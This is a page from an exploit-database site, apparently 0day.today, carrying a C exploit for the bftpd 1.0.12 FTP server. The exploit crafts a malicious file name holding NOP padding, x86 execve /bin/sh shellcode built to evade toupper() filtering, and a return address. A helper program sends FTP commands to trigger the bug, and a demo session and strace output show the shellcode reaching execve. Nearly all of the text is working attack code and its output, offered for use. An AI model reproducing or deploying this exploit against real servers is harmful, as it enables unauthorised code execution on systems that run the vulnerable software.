0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
BFTPd 1.0.12 Remote Exploit
=========================== BFTPd 1.0.12 Remote Exploit =========================== /* Creates a filname to exploit the bug in bftpd 1.0.12 Create the file, cwd in the shell directory and nlist the file directory. Coded by korty <cb@grolier.fr> */ #include <stdlib.h> #include <string.h> #include <stdio.h> #include <fcntl.h> #define LEN 205 int main (int argc, char **argv) { char buf[LEN + 12]; int ret = 0xbffffa80; int *p; int fp; char code[]= /* * Linux/x86 * * toupper() evasion, standard execve() /bin/sh (used eg. in various * imapd exploits). Goes through a loop adding 0x20 to the * (/bin/sh -= 0x20) string (ie. yields /bin/sh after addition). */ /* main: */ "\xeb\x29" /* jmp callz */ /* start: */ "\x5e" /* popl %esi */ "\x29\xc9" /* subl %ecx, %ecx */ "\x89\xf3" /* movl %esi, %ebx */ "\x89\x5e\x08" /* movl %ebx, 0x08(%esi) */ "\xb1\x07" /* movb $0x07, %cl */ /* loopz: */ "\x80\x03\x20" /* addb $0x20, (%ebx) */ "\x43" /* incl %ebx */ "\xe0\xfa" /* loopne loopz */ "\x29\xc0" /* subl %eax, %eax */ "\x88\x46\x07" /* movb %al, 0x07(%esi) */ "\x89\x46\x0c" /* movl %eax, 0x0c(%esi) */ "\xb0\x0b" /* movb $0x0b, %al */ "\x87\xf3" /* xchgl %esi, %ebx */ "\x8d\x4b\x08" /* leal 0x08(%ebx), %ecx */ "\x8d\x53\x0c" /* leal 0x0c(%ebx), %edx */ "\xcd\x80" /* int $0x80 */ "\x29\xc0" /* subl %eax, %eax */ "\x40" /* incl %eax */ "\xcd\x80" /* int $0x80 */ /* callz: */ "\xe8\xd2\xff\xff\xff" /* call start */ "\x0f\x42\x49\x4e\x0f\x53\x48"; /* /bin/sh -= 0x20 */ if (argc > 1) { ret += atoi(argv[1]); fprintf(stderr, "Using ret %#010x\n", ret); } memset(buf, '\x90', LEN); memcpy(buf + LEN - strlen(code), code, strlen(code)); p = (int *) (buf + LEN); *p++ = ret; *p++ = ret; *p = 0; fp = open(buf, O_CREAT); if(fp < 0) perror("buf"); close(fp); } /* -- BEGIN list.c -- #include <stdio.h> int main() { #define USER "cb" #define PASS "PasSwoRd" #define PORT "port 127,0,0,1,4,4" // Data on the port 1028 with the addr 127.0.0.1 #define CWD "cwd longfile" #define LIST "list" printf("user %s\n", USER); sleep(1); printf("pass %s\n", PASS); sleep(1); printf("%s\n", PORT); sleep(1); printf("%s\n", CWD); sleep(1); printf("%s\n", LIST); } -- END list.c -- A) DEMO tshaw:~/longfile$ gcc -o exploit exploit.c tshaw:~/longfile$ ls exploit* exploit.c list.c tshaw:~/longfile$ ls exploit* exploit.c list.c tshaw:~/longfile$ ./exploit tshaw:~/longfile$ ls exploit* exploit.c list.c \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\313)^)\311\211\323\211^\b\221\a\200\003\ C \300\332)\300\210F\a\211F\f\220\v\203\323\211K\b\211S\f\311\200)\300\@\311\200\310\322\333 \333\333\013BIN\013SH\200\332\333\233\200\332\333\233* tshaw:~/longfile$ tshaw:~/longfile$ gcc -o list list.c tshaw:~/longfile$ nc -l -p 1028 & [1] 29973 tshaw:~/longfile$ tshaw:~/longfile$ (./list ; cat) | nc localhost 21 220 bftpd 1.0.12 at 127.0.0.1 ready. 331 Password please. 230 User logged in. 200 PORT 127.0.0.1:1028 OK 250 OK 150 Data connection established. drwxr-xr-x 2 1000 100 4096 Dec 8 04:06 . drwxr-xr-x 55 1000 100 4096 Dec 8 04:02 .. -rw-r--r-- 1 1000 100 323 Dec 8 04:06 list.c -rwxr-xr-x 1 1000 100 11931 Dec 8 04:06 list -rw-r--r-- 1 1000 100 2178 Dec 8 03:54 exploit.c -rwxr-xr-x 1 1000 100 12861 Dec 8 03:56 exploit -r-xr--r-- 1 1000 100 0 Dec 8 03:56 릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱 릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱 릱릱릱릱릱릱릱릱?^)??? C猩)핂F덯 ? 뉡뜊S ?)??脘BINSH€???? [1]+ Done nc -l -p 1028 tshaw:~/longfile$ B) STRACE OUTPUT tshaw:~# ps -aef |grep bftpd cb 30128 62 0 Dec04 ? 00:00:00 bftpd root 30136 30024 0 Dec04 ttyqa 00:00:00 grep bftpd tshaw:~# strace -p 30128 read(0, "\n", 4096) = 1 socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 4 setsockopt(4, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0 setsockopt(4, SOL_SOCKET, SO_SNDBUF, [65536], 4) = 0 bind(4, {sin_family=AF_INET, sin_port=htons(0), sin_addr=inet_addr("127.0.0.1")}}, 16) = 0 connect(4, {sin_family=AF_INET, sin_port=htons(1028), sin_addr=inet_addr("127.0.0.1")}}, 16) = 0 write(2, "150 Data connection established."..., 34) = 34 open("/dev/null", O_RDONLY|O_NONBLOCK|0x10000) = -1 ENOENT (No such file or directory) stat(".", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0 open(".", O_RDONLY|O_NONBLOCK|0x10000) = 5 fstat(5, {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0 fcntl(5, F_SETFD, FD_CLOEXEC) = 0 brk(0x8052000) = 0x8052000 getdents(5, /* 7 entries */, 3933) = 328 stat("./.", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0 send(4, "drwxr-xr-x 2 1000 100 "..., 58, 0) = 58 stat("./..", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0 send(4, "drwxr-xr-x 55 1000 100 "..., 59, 0) = 59 stat("./list.c", {st_mode=S_IFREG|0644, st_size=323, ...}) = 0 send(4, "-rw-r--r-- 1 1000 100 "..., 63, 0) = 63 stat("./list", {st_mode=S_IFREG|0755, st_size=11931, ...}) = 0 send(4, "-rwxr-xr-x 1 1000 100 "..., 61, 0) = 61 stat("./exploit.c", {st_mode=S_IFREG|0644, st_size=2178, ...}) = 0 send(4, "-rw-r--r-- 1 1000 100 "..., 66, 0) = 66 stat("./exploit", {st_mode=S_IFREG|0755, st_size=12861, ...}) = 0 send(4, "-rwxr-xr-x 1 1000 100 "..., 64, 0) = 64 stat("./릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱? 릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱먮)^)??? C猩)핂F덯 ? 뉡뜊S ?)??脘BINSH€????, {st_mode=S_IFREG|S_ISUID|0544, st_size=0, ...}) = 0 send(4, "-r-xr--r-- 1 1000 100 "..., 270, 0) = 270 execve("/bin/sh", ["/bin/sh"], [/* 0 vars */]) = -1 ENOENT (No such file or directory) _exit(-1073743151) = ? tshaw:~# */ # 0day.today [2024-12-24] #